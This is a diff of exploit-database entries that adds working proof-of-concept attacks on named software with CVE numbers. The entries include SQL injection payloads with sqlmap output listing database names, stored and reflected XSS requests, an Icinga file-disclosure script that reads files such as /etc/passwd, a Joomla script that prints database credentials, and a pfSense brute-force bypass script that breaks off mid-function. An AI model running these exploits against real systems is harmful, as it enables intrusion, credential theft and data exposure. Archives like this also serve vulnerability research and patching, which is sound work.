User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
'''
Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)
'''
## Exploit with SQLmap
Save the request from Burp Suite to file.
'''
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
---
[05:02:49] [INFO] testing MySQL
[05:02:49] [INFO] confirming MySQL
[05:02:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)
[05:02:50] [INFO] fetching database names
[05:02:50] [INFO] fetching number of databases
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:02:55] [INFO] retrieved: 2
[05:03:12] [INFO] retrieved: biostar2_ac
[05:03:56] [INFO] retrieved: information_schema
available databases [2]:
[*] biostar2_ac
[*] information schema
'''

46
exploits/multiple/webapps/51342.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
# Version: 10.7.4-10.7.13
# Tested on: [relevant os]
# CVE : CVE-2022-25630
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
An authenticated user can embed malicious content with XSS into the admin
group policy page.
Example payload
*"/><svg/onload=prompt(document.domain)>*
POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo
HTTP/1.1
Host: X.X.X.X
Cookie: JSESSIONID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)
Gecko/20100101 Firefox/99.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 652
Origin: https://x.x.x.x
Referer:
https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000
Regards,
Omur UGUR

44
exploits/multiple/webapps/51343.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
>

32
exploits/php/webapps/51231.txt
View file

@ -1,32 +0,0 @@
# Exploit Title: GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
# Date: 11 Jun 2022
# Version: >=10.0.0 and < 10.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory:
https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31068
--
*Nuri Çilengir*
/Cyber Security Consultant/
*PRODAFT SARL*
*CH:* Y-Parc, rue Galilée 7, 1400 Yverdon-les-Bains
*TR:* Sanayi Mah. Teknopark Istanbul 5. Blok K2 Pendik, Istanbul
*NL:* HSD Campus Wilhelmina van Pruisenweg 104, 2595 AN, Den Haag
GSM: (+90) 553 444 7080
E.:nuri[at]prodaft[dot]com
IN:/cilengirnuri
/* In case you think youre not the designated recipient of the e-mail
hereby; please delete it accordingly./
/** This e-mail may have been sent from a mobile device. Please contact
me from my mobile, in case you notice an error in the content./
/PS. Feel free to contact me via Signal, Threema or Telegram; or ask for
my public PGP key for high-profile cases that may require higher
confidentiality./

68
exploits/php/webapps/51329.py Executable file
View file

@ -0,0 +1,68 @@
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
import argparse
import requests
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str,
help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str,
help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
print_message("Could not connect to provided URL!", "ERROR")
exit()
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
print(file_content)

17
exploits/php/webapps/51330.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Restaurant Management System 1.0 - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher (calfcrusher@inventati.org)
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link:
https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16
Endpoint: /rms/delete-order.php
Vulnerable parameter: id (GET)
Time Base SQL Injection payloads
http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--

132
exploits/php/webapps/51334.py Executable file
View file

@ -0,0 +1,132 @@
#!/usr/bin/env ruby
# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752
## References:
## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
## - https://vulncheck.com/blog/joomla-for-rce
## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml
# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'
doc = <<~DOCOPT
#{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}
#{Paint['Usage:', :red]}
#{__FILE__} <url> [options]
#{__FILE__} -h | --help
#{Paint['Parameters:', :red]}
<url> Root URL (base path) including HTTP scheme, port and root folder
#{Paint['Options:', :red]}
--debug Display arguments
--no-color Disable colorized output (NO_COLOR environment variable is respected too)
-h, --help Show this screen
#{Paint['Examples:', :red]}
#{__FILE__} http://127.0.0.1:4242
#{__FILE__} https://example.org/subdir
#{Paint['Project:', :red]}
#{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
#{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
#{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT
def fetch_users(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
http.get(vuln_url)
end
def parse_users(root_url, http)
data_json = fetch_users(root_url, http)
data = JSON.parse(data_json)['data']
users = []
data.each do |user|
if user['type'] == 'users'
id = user['attributes']['id']
name = user['attributes']['name']
username = user['attributes']['username']
email = user['attributes']['email']
groups = user['attributes']['group_names']
users << {id: id, name: name, username: username, email: email, groups: groups}
end
end
users
end
def display_users(root_url, http)
users = parse_users(root_url, http)
puts Paint['Users', :red, :bold]
users.each do |u|
puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
end
end
def fetch_config(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
http.get(vuln_url)
end
def parse_config(root_url, http)
data_json = fetch_config(root_url, http)
data = JSON.parse(data_json)['data']
config = {}
data.each do |entry|
if entry['type'] == 'application'
key = entry['attributes'].keys.first
config[key] = entry['attributes'][key]
end
end
config
end
def display_config(root_url, http)
c = parse_config(root_url, http)
puts Paint['Site info', :red, :bold]
puts "Site name: #{c['sitename']}"
puts "Editor: #{c['editor']}"
puts "Captcha: #{c['captcha']}"
puts "Access: #{c['access']}"
puts "Debug status: #{c['debug']}"
puts
puts Paint['Database info', :red, :bold]
puts "DB type: #{c['dbtype']}"
puts "DB host: #{c['host']}"
puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
puts "DB name: #{c['db']}"
puts "DB prefix: #{c['dbprefix']}"
puts "DB encryption #{c['dbencryption']}"
end
begin
args = Docopt.docopt(doc)
Paint.mode = 0 if args['--no-color']
puts args if args['--debug']
http = HTTPX
display_users(args['<url>'], http)
puts
display_config(args['<url>'], http)
rescue Docopt::Exit => e
puts e.message
end

40
exploits/php/webapps/51337.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS)
# Date: 25/02/2023
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html
# Tested on: Windows
use payload="><script>alert(XSS)</script>
1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php
2. login Doctor account with default credential
3. Click left side add description
4. capture request and put payload
http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
request
GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close

126
exploits/php/webapps/51338.txt Normal file
View file

@ -0,0 +1,126 @@
# Exploit Title: Medicine Tracker System v1.0 - Sql Injection
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip
# Version: V1.0.0
# Tested on: Windows/Linux
# Proof of Concept:
# 1- http://localhost/php-mts/app/login.php
# 2- login with default credential
# 3- Click left side Manage account and fill Update User Details and click update account
# 4- Capture request using burp suite
# 5- Save request request.txt
Sqlmap
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
Host: localhost
Content-Length: 661
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-mts/app/?page=manage_account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="id"
1'-'
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="firstname"
gogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="middlename"
ogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="lastname"
singh
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="username"
mayuri.infospace@gmail.com
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="password"
12345678
------WebKitFormBoundaryeOo3CzyRX6fHexZx--
sqlmap
sqlmap -r request.txt -p "id" --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:18:01 /2023-03-21/
[13:18:01] [INFO] parsing HTTP request from 'request.txt'
it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N
[13:18:01] [INFO] resuming back-end DBMS 'mysql'
[13:18:01] [INFO] testing connection to the target URL
[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss
---
[13:18:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.0.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:18:01] [INFO] fetching database names
[13:18:01] [INFO] resumed: 'information_schema'
[13:18:01] [INFO] resumed: 'art_gallery'
[13:18:01] [INFO] resumed: 'hcpms'
[13:18:01] [INFO] resumed: 'mts_db'
[13:18:01] [INFO] resumed: 'mysql'
[13:18:01] [INFO] resumed: 'performance_schema'
[13:18:01] [INFO] resumed: 'phpmyadmin'
[13:18:01] [INFO] resumed: 'sscdms_db'
[13:18:01] [INFO] resumed: 'test'
available databases [9]:
[*] art_gallery
[*] hcpms
[*] information_schema
[*] mts_db
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sscdms_db
[*] test
[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'
[*] ending @ 13:18:01 /2023-03-21/

57
exploits/php/webapps/51344.txt Normal file
View file

@ -0,0 +1,57 @@
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

46
exploits/php/webapps/51345.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: Actions[subject]
# CVE: CVE-2022-48178
# Date: 27.12.2022
'''
POC REQUEST:
========
POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost
Connection: close
Referer:
http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test
EXPLOITATION
========
1. Create an action
2. Inject payload to the vulnerable parameter in POST request
Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E
'''

45
exploits/php/webapps/51346.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: model
# CVE: Use CVE-2022-48177
# Date: 27.12.2022
'''
POC REQUEST:
========
GET
/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=959fpkms4abdhtresce9k9rmk3;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
locationTrackingFrequency=60; locationTrackingSwitch=1;
5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
EXPLOITATION
========
1. Select Import Records Model in admin settings
2. Inject payload to the vulnerable parameter in GET request
Payload: "><body onload="alert(4)">
'''

46
exploits/php/webapps/51349.txt Normal file
View file

@ -0,0 +1,46 @@
Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 02.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the page can do this
payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
POST /admin/pages/add.php HTTP/1.1
Host: localhost
Content-Length: 137
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9
Connection: close
b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add
2. Visit http://localhost/

95
exploits/php/webapps/51352.py Executable file
View file

@ -0,0 +1,95 @@
#!/usr/bin/python3
## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100
# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66
import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning
# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
sys.exit(1)
# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList
# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')
def login(userlogin, userpasswd):
session = requests.session()
